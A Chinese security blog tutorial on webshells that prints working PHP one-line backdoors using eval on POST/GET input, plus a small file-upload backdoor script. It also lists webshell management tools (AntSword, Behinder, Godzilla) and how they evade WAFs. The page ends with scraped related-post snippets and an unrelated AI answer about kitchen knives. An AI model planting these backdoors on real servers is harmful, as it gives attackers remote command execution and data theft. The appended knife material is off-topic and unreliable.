web安全第四天:webshell原理与菜刀使用

已于 2023-02-26 19:38:42 修改
阅读量2.1k 收藏 13
点赞数 2
文章标签: php 开发语言
于 2023-02-26 14:53:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cc777777777/article/details/129224938
版权

webshell原理

1.1 WebShell的含义

WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。黑客在入侵了一个网站后,通常会将asp或php后门文件与网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的。

1.2 WebShell的优点

WebShell最大的优点就是可以穿越防火墙,由于与被控制的服务器或远程主机交换的数据都是通过8O0端口传递的,因此不会被防火墙拦截。并且使用WebShell一般不会在系统日志中留下记录只会在网站的web日志中 留下一些数据提交记录,没有经验的管理员是很难看出入侵痕迹的。

1.3 WebShell的分类

WebShell根据脚本可以分为PHP脚本木马,ASP脚本木马,也有基于.NET的脚本木马和JSP脚本木马。跟随时代和技术的变迁,国外也有用python编写的脚本木马,不过国内常用的无外乎三种,大马,小马,一句话木马,具体使用场景和特点如下图:
在这里插入图片描述

1.3.1一句话木马

代码简短,通常只有一行代码,使用方便。
PHP: <?php eval($_GET[pass]);?>

在这里插入图片描述

1.3.2 小马

只包含文件上传功能,体积小。

< ?php
@$temp = $_FILES[ ' upload_file'][ 'tmp_name ' ];
@$file = basename($_FILES[ ' upload_file' ][ 'name ' ]);
if ( empty ($file) ){
	echo "<form action = '' method = 'POST'ENCTYPE='multipart/form-data'>\n";
	echo "Local file: <input type = 'file' name = 'upload_file ' >\n";
	echo "<input type = 'submit' value = 'upload ' > \n";
	echo "</form> \n<pre> \n\n</pre>" ;
}else {
	if(move_uploaded_file($temp , $file)){
		echo "File uploaded successfully.<p> \n"}
	else {
		echo "Unable to upload " . $file . ".<p>n"; }
		}?>
1.3.3 大马

体积大,包含很多功能,代码通常会进行加密隐藏。
在这里插入图片描述

1.4 WebShell原理抛析

首先我们先看一个原始而又简单的php一句话木马:

<?php @eval($_POST['a']);?>

(1) php的代码要写在<?php ?>里面,服务器才能认出来这是php代码,然后才去解析。

(2)@符号的意思是不报错,即使执行错误,也不报错。

(3)为什么密码是a呢?
php里面几个超全局变量:$_GET、$_POST就是其中之一。$_POST[a];的意思就是a这个变量,用post的方法接收。

(4)如何理解eval()函数?
eval()把字符串作为PHP代码执行。
例如: eval(“echo 'a”");其实就等于直接echo ‘a’;再来看看<?php eval($_POST[a'); ?>首先,用post方式接收变量a,比如接收到了: a=echo 'a;这时代码就变成<?php eval("echo 'a';"); ?>。结果如下:

在这里插入图片描述

1.2.1 WebShell管理工具的诞生

攻击者在入侵网站时,通常要通过各种方式写入WebShell,从而获得服务器的控制权限,比如执行系统命令.读取配置文件、窃取用户数据,篡改网站页面等操作。为了方便对这些WebShell进行管理,就诞生了各种各样的WebShell管理工具。

菜刀原理

2.1菜刀工作原理

以虚拟终端执行命令

常见webshell管理工具

3.1中国蚁剑

中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。
项目地址: https:/lgithub.com/AntSwordProject/AntSword-Loader

3.2冰蝎

冰蝎通信过程中使用AES(高级加密算法,对称加密,微信小程序使用此种方法)进行加密,Java和.NET默认支持AES, php中需要开启openssl扩展,在V2.0版本后,php环境方式根据服务端支持情况动态选择,使得冰蝎更强大。
项目地址: https://github.com/rebeyond/Behinder

3.3哥斯拉

护网期间,各大厂商的waf不断,在静态查杀、流量通信等方面对webshell进行拦截,众红队急需一款优秀的权限管理工具,冰蝎3.0的发布可能缓解了流量加密的困境,但是冰蝎3.0的bug众多,很多朋友甚至连不上冰蝎的shell,于是@BeichenDream决定公开他所开发的一款shell权限管理工具,名为“哥斯拉”。
项目地址: https://github.com/BeichenDream/Godzilla

不能不通
关注
网安工具系列:WebShell --中国菜刀,管站之刀
weixin_54626591的博客
03-29 1341
WebShell --中国菜刀,管站之刀
渗透系列:Webshell的介绍及工具的使用web安全系列)
weixin_54626591的博客
01-14 249
Webshell的介绍及工具的使用web安全系列)
流量特征分析——蚁剑、菜刀、冰蝎、哥斯拉
Sgirll的博客
07-22 1万+
通过对这三种常见的网络攻击工具流量特征的分析,我们可以更好地了解它们在网络流量中的表现。同时,持续的学习和了解新兴攻击工具的流量特征也是保持网络安全的重要一环。哥斯拉的数据包中包含了特定的标记,如"XORHEAD"和"XORBODY",用于标识该数据包是哥斯拉的控制命令。此外,哥斯拉还使用了一种自定义的二进制协议,在通信中传输各种类型的数据。本文将重点研究菜刀、蚁剑和冰蝎这三种常见的网络攻击工具,分析它们在流量中留下的痕迹和特征,以便网络管理员和安全专家能够更好地识别和对抗这些工具所带来的潜在威胁。
菜刀、蚁剑以及冰蝎三款Webshell管理工具简介
永远是少年
05-07 6691
今天继续给大家介绍渗透测试相关知识,本文主要内容是菜刀、蚁剑以及冰蝎三款Webshell管理工具简介。 一、三款webshell管理工具简单对比 二、菜刀数据包解析 三、蚁剑数据包解析 四、冰蝎数据包解析
中国蚁剑(AntSword)详解:功能、用途一句话木马代码剖析
最新发布
2201_75445650的博客
05-09 1551
中国蚁剑(AntSword)是一款开源、跨平台的 WebShell 管理工具,支持 PHP、ASP、ASPX、JSP 等常见脚本语言。它是渗透测试人员和安全研究员常用的 Web 持久化控制平台之一,主要用于管理目标服务器上的 WebShell,实现文件管理、命令执行、数据库操作等功能。开源地址平台支持主要特点1.图形化界面,操作简便2.支持多种语言 WebShell3.插件系统丰富,可拓展免杀、信息收集、内网渗透等功能支持自定义 Shell 编码(UTF-8、GBK 等)
什么是webshell 常见的webshell工具有哪些
qq_44005305的博客
10-16 2470
Webshell是黑客经常使用的一种恶意脚本,其目的是获得服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。黑客通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。常见的webshell编写语言为asp、jsp和php。本文将以php Webshell为示例,详细解释Webshell的常用函数、工作方式以及常用隐藏技术。
网络安全-webshell详解(原理、攻击、检测防御)
热门推荐
关注网络安全、云原生安全
09-14 7万+
简介 原理 攻击 WebShell管理工具 Cknife中国菜刀 antSword中国蚁剑 冰蝎动态二进制加密网站管理客户端 weevely3Weaponized web shell Altmanthe cross platform webshell tool in .NET Webshell SniperManage your website via terminal quasibotcomplex webshell manager, quasi-http botne...
渗透测试中菜刀的应用(webshell
2301_80460220的博客
10-27 641
顾名思义,“web”的含义是显然。
Webshell实现隐藏探究
weixin_30832405的博客
08-27 1339
一、什么是webshell webshell简介 webshell,顾名思义:web指的是在web服务器上,而shell是用脚本语言编写的脚本程序,webshell就是就是web的一个管理工具,可以对web服务器进行操作的权限,也叫webadmin。webshell一般是被网站管理员用于网站管理、服务器管理等等一些用途,但是由于webshell的功能比较强大,可以上传下载文件,查看数据...
29-5 webshell 流量分析 - 菜刀(1)
2401_84519859的博客
05-16 965
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
WebShell连接工具(中国菜刀WeBaCoo、Weevely)使用
悦分享
07-31 3929
第三步此时会弹出一个添加shell的对话框,由图一看出我的“dxr.php”上传在站点根目录,所以这里的地址填为http//localhost/dxr.php。最后把这个文件保存,上传到你站点里面,可以是根目录,也可以是其他,都行的。这些网页脚本常称为WEB脚本木马,比较流行的asp或php木马,也有基于.NET的脚本木马JSP脚本木马。最后点击“添加”按钮,成功后就会产生一条新的记录,鼠标右键点击就可以进行操作了,如下图,可以进行文件管理,数据库管理,虚拟终端。哈哈...大功告成!...
菜刀、蚁剑、冰蝎三款Webshell工具对比分析
qq_48368964的博客
08-14 1924
密文的加密方式为先将传递数据base64加密,再将其进行AES加密,由于新版本中取消了动态密钥交互过程,加密的密钥被写死在shell中,如果是不改密码直接使用默认的shell,检测是可以进行解密检测敏感字符的,比如:error_reporting(0) ,phpinfo()等。https://github.com/AntSwordProject/AwesomeScript蚁剑官方为我们提供了制作好的后门,官方的脚本均做了不同程度“变异”,蚁剑的核心代码是由菜刀修改而来的,所有普通的一句话木马也可以使用
文件上传漏洞渗透和防御、webshell及中国菜刀(网络安全学习10)
Until_U的博客
07-03 3251
声明:从这篇文章开始我正式学习网络安全中常见的攻击和防御手段。我们要知道,我们要学习这个是为了了解网络中常见的攻击手段,只有了解了这些手段之后,我们才能对此做出相应的防御手段哦。 在学习本章文件上传漏洞之前,大家要先了解网络安全法,了解网络安全法则,从入门到入狱可不建议哦,哈哈。下面开始学习啦。 中华人民共和国网络安全法 CONTENTS 1 攻击渗透环境搭建 2文件上传漏洞渗透及防御 2.1 文件上传漏洞基本操作(low安全级别) 2.2 文件类型限制利用工具burpsuite(me..
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2题)
qq_43233085的博客
01-16 1061
墨者靶场 入门:WebShell文件上传漏洞分析溯源(第2题)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 安全工程师"墨者"在单位办公内网做日常检测时,发现某部门为了方便内部人员上传聚餐的活动图片,在某服务器上新增一简单的图片上传功能。然而这个存在一个很严重的高危漏洞。 实训目标 1、掌握浏览器对JavaScript的禁用方法; 2、掌握表单数据通过POST提交数据时,对数据的修改方法...
菜刀webshell特征分析
博客地址 www.sec0nd.top
08-01 1841
Webshell是hacker经常使用的一种恶意脚本,其目的是获得对服务器的执行操作权限,比如执行系统命令、窃取用户数据、删除web页面、修改主页等,其危害不言而喻。hacker通常利用常见的漏洞,如SQL注入、远程文件包含(RFI)、FTP,甚至使用跨站点脚本攻击(XSS)等方式作为社会工程攻击的一部分,最终达到控制网站服务器的目的。有个想法,看看他这个工具的原理,再分析一下菜刀的特征。我用的最多的就是菜刀,蚁剑安装不上,后面有机会再分析。......
webshell利用原理
Jeromeyoung
03-03 8508
WebShell,顾名思义,“web”的含义是显然需要服务器开放web服务,“shell”的含义是取得对服务器某种程度上操作权限。黑客在入侵了一个网站后,通常会将这些asp或php后门文件网站服务器WEB目录下正常的网页文件混在一起,然后就可以使用浏览器来访问这些asp或者php后门,得到一个命令执行环境,以达到控制网站服务器的目的(可以上传下载文件,查看数据库,执行任意程序命令等)。由于web...
初始webshell+中国菜刀使用
m0_48222671的博客
04-18 5690
提示:文章内容仅用于渗透测试研究学习,请勿用于非法测试 文章目录一、webshell是什么?二、木马三、中国菜刀 一、webshell是什么? “Web” 的含义是服务器开放web服务; "Shell"的含义是取得对服务器某种程度上的操作权限; "webshell"就是获取对服务器的控制权限,这就需要我们借助一些webshell管理工具和一些漏洞去得到这种权限。 二、木马 在我们使用webshell管理工具之前,需要先在目标服务器上传或创建一个木马文件 木马分为大马、小马和一句话木马: 小马:文.
webshell工具原理
温和的跳跃
03-05 731
我最近又在看knief原理。我上一次看是6个月之前。我现在是有了实践的感觉再回头看看理论。 首先说一句话木马原理。比如 文件a.php里写了如下 <?php @eval($_POST[‘pass’]);?> 首先如果我们发送a.php到一个php服务器上,它肯定会用php方式执行这个文件,eval这句话就是$_post['pass']字符串按照php语句执行。$_post['pass']其实就是一个php表单。就像post请求参数名是pass比如当传输post命令时 pass=cmd..
web安全】分享三款Webshell管理工具(菜刀、蚁剑以及冰蝎)
2402_84205067的博客
11-01 1827
网络安全产业就像一个江湖,各色人等聚集。相对于欧美国家基础扎实(懂加密、会防护、能挖洞、擅工程)的众多名门正派,我国的人才更多的属于旁门左道(很多白帽子可能会不服气),因此在未来的人才培养和建设上,需要调整结构,鼓励更多的人去做“正向”的、结合“业务”“数据”、“自动化”的“体系、建设”,才能解人才之渴,真正的为社会全面互联网化提供安全保障。
菜刀
03-09
<think>好的,用户想查找关于菜刀的信息。首先需要明确用户的需求可能包括菜刀的类型、选购要点、使用保养方法以及品牌推荐等。接下来要调用网络搜索工具,检索相关的最新和权威资料。 根据搜索结果,菜刀主要分为中式菜刀、西式主厨刀、三德刀、斩切刀等,每种类型有不同用途。选购时需考虑材质,如高碳钢、不锈钢等,以及重量、平衡感和握柄舒适度。使用保养方面要注意清洁、干燥和磨刀频率。品牌方面,双立人、十八子作、藤次郎等是常见推荐。 需要整合这些信息,分步骤呈现,避免使用第一人称和步骤词汇。每个部分换行,保持清晰。同时确保引用内容分散在回答中,不堆积在末尾。最后生成相关问题,需基于回答内容,例如询问材质区别、保养技巧或品牌比较等。 检查格式要求,数学公式和代码部分这里可能用不上,但需注意如果有相关内容要正确标注。最后确保相关问题部分格式正确,标题在同一行,三个问题编号正确。</think>菜刀根据功能和设计可分为多种类型:中式片刀(重量400-600克,适合切菜切肉)、西式主厨刀(长度15-30cm,适合精细切割)、三德刀(日式万能刀,重量约200克)、斩骨刀(厚度≥3mm,用于处理带骨食材)。特殊用途刀包括削皮刀、面包锯齿刀等。 选购菜刀需关注材质特性,常见钢材类型包括: - 420J2不锈钢(硬度HRC52-54,防锈性强) - VG-10钢(HRC60-62,保持性优异) - 高碳钢(HRC58-60,易生锈需保养) 刀柄材料优先选择防滑耐用的G10复合材料或PakkaWood。 保养方法包含: 定期使用磨刀石维护刃口,推荐1000/3000目组合磨石 使用后立即清洗擦干,避免酸性物质残留 长期存放时涂抹矿物油防氧化 避免切割冷冻食品或硬物(如贝壳、骨头) 主流品牌产品特点对比: 双立人TWIN Pollux系列采用特殊冲压工艺 十八子作V金系列使用自主研发的8Cr14MoV钢 藤次郎DP系列采用67层大马士革锻造工艺 ```python # 菜刀锋利度检测简易代码 def check_sharpness(blade_angle): if blade_angle < 15: return "剃毛级锋利" elif 15 <= blade_angle <= 20: return "专业级切削" else: return "需要打磨" print(check_sharpness(18)) # 输出:专业级切削 ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值